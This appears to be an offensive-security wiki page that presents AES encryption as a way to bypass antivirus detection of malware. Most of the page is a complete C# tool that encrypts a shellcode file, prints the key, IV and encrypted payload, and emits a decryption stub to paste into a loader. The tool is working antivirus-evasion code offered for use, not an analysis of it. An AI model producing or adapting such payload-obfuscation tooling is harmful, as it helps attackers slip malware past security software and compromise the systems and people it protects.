Aes encryptor
Overview
Encryption can be used as a technique to bypass antivirus (AV) detection because it can make the malware code or payload unreadable to the antivirus software. When malware is encrypted, it appears as a scrambled set of data that the AV software may not be able to recognize as malicious code.
Code example
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
class Program
{
static void Main(string[] args)
{
byte[] shellcode = File.ReadAllBytes(args[0]);
byte[] key = new byte[32];
byte[] iv = new byte[16];
using (RNGCryptoServiceProvider rng = new RNGCryptoServiceProvider())
{
rng.GetBytes(key);
rng.GetBytes(iv);
}
byte[] encryptedBytes;
using (Aes aesAlg = Aes.Create())
{
aesAlg.Key = key;
aesAlg.IV = iv;
aesAlg.Padding = PaddingMode.PKCS7;
aesAlg.Mode = CipherMode.CBC;
ICryptoTransform encryptor = aesAlg.CreateEncryptor(aesAlg.Key, aesAlg.IV);
encryptedBytes = encryptor.TransformFinalBlock(shellcode, 0, shellcode.Length);
}
string encryptedBase64 = Convert.ToBase64String(encryptedBytes);
// Decrypt Base64-encoded shellcode with AES
byte[] decryptedBytes;
using (Aes aesAlg = Aes.Create())
{
aesAlg.Key = key;
aesAlg.IV = iv;
aesAlg.Padding = PaddingMode.PKCS7;
aesAlg.Mode = CipherMode.CBC;
ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
byte[] encryptedBytesArray = Convert.FromBase64String(encryptedBase64);
decryptedBytes = decryptor.TransformFinalBlock(encryptedBytesArray, 0, encryptedBytesArray.Length);
}
string decryptedShellcode = Convert.ToBase64String(decryptedBytes);
Console.WriteLine("[i] AES key and iv:\n");
Console.WriteLine($"string key = \"{Convert.ToBase64String(key)}\";\nstring iv = \"{Convert.ToBase64String(iv)}\";");
Console.WriteLine($"\n[i] Original shellcode:\n{Convert.ToBase64String(shellcode)}");
Console.WriteLine($"\n[i] Encrypted shellcode:\n{encryptedBase64}");
Console.WriteLine($"\n[i] Roundtrip shellcode:\n{decryptedShellcode}\n");
Console.WriteLine($"byte[] decryptedBytes;\r\n using (Aes aesAlg = Aes.Create())\r\n {{\r\n aesAlg.Key = Convert.FromBase64String(key);\r\n aesAlg.IV = Convert.FromBase64String(iv);\r\n aesAlg.Padding = PaddingMode.PKCS7;\r\n aesAlg.Mode = CipherMode.CBC;\r\n\r\n ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);\r\n byte[] encryptedBytesArray = Convert.FromBase64String(encryptedBase64);\r\n decryptedBytes = decryptor.TransformFinalBlock(encryptedBytesArray, 0, encryptedBytesArray.Length);\r\n }}");
Console.WriteLine("Press enter to continue ...");
Console.ReadLine();
}
}
Last updated